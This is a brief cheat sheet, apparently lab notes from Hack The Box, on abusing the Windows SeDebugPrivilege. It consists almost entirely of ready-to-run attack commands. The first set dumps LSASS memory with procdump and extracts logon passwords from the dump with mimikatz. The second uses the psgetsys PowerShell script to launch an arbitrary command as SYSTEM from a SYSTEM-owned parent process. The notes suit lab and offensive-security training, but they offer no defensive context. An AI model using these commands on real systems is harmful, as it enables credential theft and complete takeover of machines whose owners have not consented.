Abuse of SeDebugPrivilege

https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/security-policy-settings/debug-programs

https://learn.microsoft.com/en-us/sysinternals/downloads/procdump

https://en.wikipedia.org/wiki/Local_Security_Authority_Subsystem_Service

https://github.com/daem0nc0re/PrivFu/tree/main/PrivilegedOperations/SeDebugPrivilegePoC

C:\htb> procdump.exe -accepteula -ma lsass.exe lsass.dmp
C:\htb> mimikatz.exe
mimikatz # log
mimikatz # sekurlsa::minidump lsass.dmp
mimikatz # sekurlsa::logonpasswords

Remote Code Execution as SYSTEM

https://github.com/decoder-it/psgetsystem

Open PowerShell as administrator

# Get the PID of a process running as SYSTEM
PS C:\htb> tasklist
PS C:\htb> .\psgetsys.ps1; [MyProcess]::CreateProcessFromParent(<SYSTEM-PID>,<COMMAND-TO-EXECUTE>,"")
# or
PS C:\htb> .\psgetsys.ps1; [MyProcess]::CreateProcessFromParent((Get-Process 'lsass').Id,<COMMAND-TO-EXECUTE>,"")
